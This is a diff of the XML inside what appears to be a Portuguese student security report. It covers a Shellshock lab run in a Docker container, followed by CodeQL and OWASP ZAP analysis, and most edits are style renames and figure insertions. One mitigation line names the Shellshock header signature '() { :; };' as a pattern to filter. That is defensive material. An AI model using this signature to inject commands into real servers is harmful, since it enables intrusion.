@@ -8786,10 +6472,10 @@
       <w:color w:val="9900FF"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Rodap">
+  <w:style w:type="paragraph" w:styleId="Footer">
     <w:name w:val="footer"/>
     <w:basedOn w:val="Normal"/>
-    <w:link w:val="RodapCarter"/>
+    <w:link w:val="FooterChar"/>
     <w:uiPriority w:val="99"/>
     <w:unhideWhenUsed/>
     <w:rsid w:val="005B434B"/>
@@ -8807,10 +6493,10 @@
       <w:lang w:eastAsia="ja-JP"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="RodapCarter">
-    <w:name w:val="Rodapé Caráter"/>
-    <w:basedOn w:val="Tipodeletrapredefinidodopargrafo"/>
-    <w:link w:val="Rodap"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
+    <w:name w:val="Footer Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Footer"/>
     <w:uiPriority w:val="99"/>
     <w:rsid w:val="005B434B"/>
     <w:rPr>
@@ -8822,7 +6508,7 @@
   </w:style>
   <w:style w:type="numbering" w:styleId="111111">
     <w:name w:val="Outline List 2"/>
-    <w:basedOn w:val="Semlista"/>
+    <w:basedOn w:val="NoList"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
@@ -8833,9 +6519,9 @@
       </w:numPr>
     </w:pPr>
   </w:style>
-  <w:style w:type="table" w:styleId="TabelacomGrelha">
+  <w:style w:type="table" w:styleId="TableGrid">
     <w:name w:val="Table Grid"/>
-    <w:basedOn w:val="Tabelanormal"/>
+    <w:basedOn w:val="TableNormal"/>
     <w:uiPriority w:val="59"/>
     <w:rsid w:val="005B434B"/>
     <w:pPr>
@@ -8887,7 +6573,7 @@
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="CCSHeadchar">
     <w:name w:val="CCSHead char"/>
-    <w:basedOn w:val="Tipodeletrapredefinidodopargrafo"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
     <w:link w:val="CCSHead"/>
     <w:rsid w:val="005B434B"/>
     <w:rPr>
@@ -8898,7 +6584,7 @@
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="KeyWordHeadchar">
     <w:name w:val="KeyWordHead char"/>
-    <w:basedOn w:val="Tipodeletrapredefinidodopargrafo"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
     <w:link w:val="KeyWordHead"/>
     <w:rsid w:val="005B434B"/>
     <w:rPr>
@@ -8921,7 +6607,7 @@
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="Head3oldChar">
     <w:name w:val="Head3old Char"/>
-    <w:basedOn w:val="Tipodeletrapredefinidodopargrafo"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
     <w:link w:val="Head3old"/>
     <w:rsid w:val="005B434B"/>
     <w:rPr>
@@ -8961,7 +6647,7 @@
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="Parachar">
     <w:name w:val="Para char"/>
-    <w:basedOn w:val="Tipodeletrapredefinidodopargrafo"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
     <w:rsid w:val="005B434B"/>
     <w:rPr>
       <w:rFonts w:ascii="Linux Libertine O" w:hAnsi="Linux Libertine O" w:cs="Linux Libertine O"/>
@@ -9005,10 +6691,10 @@
       <w:lang w:eastAsia="en-US"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo1Carter">
-    <w:name w:val="Título 1 Caráter"/>
-    <w:basedOn w:val="Tipodeletrapredefinidodopargrafo"/>
-    <w:link w:val="Ttulo1"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
+    <w:name w:val="Heading 1 Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Heading1"/>
     <w:uiPriority w:val="9"/>
     <w:rsid w:val="005B434B"/>
     <w:rPr>
@@ -9018,10 +6704,10 @@
       <w:szCs w:val="32"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo2Carter">
-    <w:name w:val="Título 2 Caráter"/>
-    <w:basedOn w:val="Tipodeletrapredefinidodopargrafo"/>
-    <w:link w:val="Ttulo2"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
+    <w:name w:val="Heading 2 Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Heading2"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
     <w:rsid w:val="005B434B"/>
@@ -9034,7 +6720,7 @@
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="In-textcode">
     <w:name w:val="In-text code"/>
-    <w:basedOn w:val="Tipodeletrapredefinidodopargrafo"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
     <w:uiPriority w:val="1"/>
     <w:qFormat/>
     <w:rsid w:val="003A253B"/>
@@ -9122,9 +6808,9 @@
       <w:szCs w:val="24"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="MenoNoResolvida">
+  <w:style w:type="character" w:styleId="UnresolvedMention">
     <w:name w:val="Unresolved Mention"/>
-    <w:basedOn w:val="Tipodeletrapredefinidodopargrafo"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
@@ -9134,7 +6820,7 @@
       <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="Legenda">
+  <w:style w:type="paragraph" w:styleId="Caption">
     <w:name w:val="caption"/>
     <w:basedOn w:val="Normal"/>
     <w:next w:val="Normal"/>
@@ -9153,10 +6839,10 @@
       <w:szCs w:val="18"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo3Carter">
-    <w:name w:val="Título 3 Caráter"/>
-    <w:basedOn w:val="Tipodeletrapredefinidodopargrafo"/>
-    <w:link w:val="Ttulo3"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
+    <w:name w:val="Heading 3 Char"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:link w:val="Heading3"/>
     <w:uiPriority w:val="9"/>
     <w:semiHidden/>
     <w:rsid w:val="001571C3"/>

--- a/docs/modulo-2.docx
+++ b/docs/modulo-2.docx
@@ -624,7 +624,6 @@
         <w:pStyle w:val="Head2"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Preparação do ambiente</w:t>
       </w:r>
     </w:p>
@@ -707,6 +706,7 @@
           <w:rFonts w:eastAsia="Cambria"/>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Comando usado para arrancar o contentor:</w:t>
       </w:r>
     </w:p>
@@ -723,23 +723,7 @@
           <w:rFonts w:eastAsia="Cambria"/>
           <w:lang w:val="en-GB" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t>“</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="en-GB" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>docker</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="en-GB" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> run -it -p 8080:80 --name shellshock jsimao/cs-shellshock-amd64</w:t>
+        <w:t>“docker run -it -p 8080:80 --name shellshock jsimao/cs-shellshock-amd64</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -809,6 +793,9 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C1D9EFB" wp14:editId="41649B9E">
             <wp:extent cx="5562600" cy="3359785"/>
@@ -1043,8 +1030,10 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
+          <w:noProof/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D91A6B2" wp14:editId="0EE62A88">
             <wp:extent cx="4692315" cy="1703910"/>
@@ -1127,6 +1116,104 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Head2"/>
       </w:pPr>
       <w:r>
@@ -1269,12 +1356,16 @@
         <w:pStyle w:val="ParaContinue"/>
         <w:keepNext/>
         <w:ind w:firstLine="0"/>
-      </w:pPr>
-      <w:r>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39EEF5CC" wp14:editId="006B9D2F">
-            <wp:extent cx="5562600" cy="3162935"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39EEF5CC" wp14:editId="655C22E7">
+            <wp:extent cx="4422384" cy="2514600"/>
             <wp:effectExtent l="0" t="0" r="0" b="0"/>
             <wp:docPr id="11491023" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
             <wp:cNvGraphicFramePr>
@@ -1296,7 +1387,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="5562600" cy="3162935"/>
+                      <a:ext cx="4427646" cy="2517592"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1401,6 +1492,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Cambria"/>
+          <w:noProof/>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
         <w:drawing>
@@ -1549,6 +1641,46 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Head3"/>
         <w:rPr>
           <w:rFonts w:eastAsia="Cambria"/>
@@ -1658,6 +1790,7 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Cambria"/>
+          <w:noProof/>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
@@ -1835,6 +1968,8 @@
         <w:ind w:firstLine="0"/>
         <w:rPr>
           <w:rFonts w:eastAsia="Cambria"/>
+          <w:b/>
+          <w:bCs/>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
       </w:pPr>
@@ -1845,116 +1980,36 @@
           <w:bCs/>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t>Evidências recolhidas:</w:t>
-      </w:r>
-      <w:r>
+        <w:t>Verificação da existência e conteúdo do ficheiro:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:ind w:firstLine="0"/>
         <w:rPr>
           <w:rFonts w:eastAsia="Cambria"/>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:t>Após a criação, a presença e o conteúdo do ficheiro foram confirmados).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:keepNext/>
         <w:ind w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>(COLOCAR IMAGEM DE EXEMPLO)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> que mostra o payload injetado / terminal com o comando curl (para melhor rastreabilidade). (Inserir imagem: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>evidence_created_file.jpg</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> — posicionado imediatamente após a descrição do payload.)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Verificação da existência e conteúdo do ficheiro:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Após a criação, a presença e o conteúdo do ficheiro foram confirmados).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
+          <w:noProof/>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
         <w:drawing>
@@ -1996,6 +2051,50 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:eastAsia="Cambria"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figura </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>6</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - Confirmação da existência e conteúdo do ficheiro criado em /tmp</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="ParaContinue"/>
         <w:ind w:firstLine="0"/>
         <w:rPr>
@@ -2003,60 +2102,6 @@
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>(COLOCAR IMAGEM DE EXEMPLO)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> conteúdo/listagem do ficheiro /tmp/evidence_file.txt. (Inserir imagem: evidence_file_existence_and_content.jpg — posicionado imediatamente após a frase seguinte.)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ParaContinue"/>
-        <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Legenda sugerida</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>: “Confirmação da existência e conteúdo do ficheiro criado em /tmp.”</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsia="Cambria"/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2088,7 +2133,6 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
@@ -2262,6 +2306,7 @@
           <w:rFonts w:eastAsia="Cambria"/>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>(COLOCAR IMAGEM DE EXEMPLO)</w:t>
       </w:r>
       <w:r>
@@ -2300,24 +2345,92 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="ParaContinue"/>
+        <w:keepNext/>
         <w:ind w:firstLine="0"/>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>Legenda sugerida:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> “Excerto de getenv.cgi mostrando QUERY_STRING — ilustração de que a query string chega como única variável QUERY_STRING.”</w:t>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AEDAC78" wp14:editId="5735B431">
+            <wp:extent cx="4329545" cy="2595256"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="192956569" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="192956569" name="Picture 1" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="4330916" cy="2596078"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figura </w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>7</w:t>
+      </w:r>
+      <w:r>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - Pedido efetuado com valor na query string</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2581,21 +2694,7 @@
         <w:rPr>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">Filtrar cabeçalhos HTTP e monitorizar padrões maliciosos (ex.: () </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>{ :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>; };).</w:t>
+        <w:t>Filtrar cabeçalhos HTTP e monitorizar padrões maliciosos (ex.: () { :; };).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2678,6 +2777,7 @@
         <w:rPr>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Parte 2 — Análise estática (CodeQL) e dinâmica (OWASP ZAP)</w:t>
       </w:r>
     </w:p>
@@ -2927,39 +3027,116 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Para"/>
-        <w:ind w:left="720" w:firstLine="0"/>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>(COLOCAR IMAGEM DE EXEMPLO)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
-        </w:rPr>
-        <w:t>screenshot do resultado da query HardcodedPasswordField.ql mostrando a entrada JWTRefreshEndpoint.java</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pStyle w:val="ParaContinue"/>
         <w:ind w:firstLine="0"/>
         <w:rPr>
           <w:lang w:val="pt-PT" w:eastAsia="en-US"/>
         </w:rPr>
       </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ParaContinue"/>
+        <w:keepNext/>
+        <w:ind w:firstLine="0"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D779678" wp14:editId="3EFA39BF">
+            <wp:extent cx="3646863" cy="1405041"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
+            <wp:docPr id="1455168094" name="Picture 1" descr="A screenshot of a computer program&#10;&#10;AI-generated content may be incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
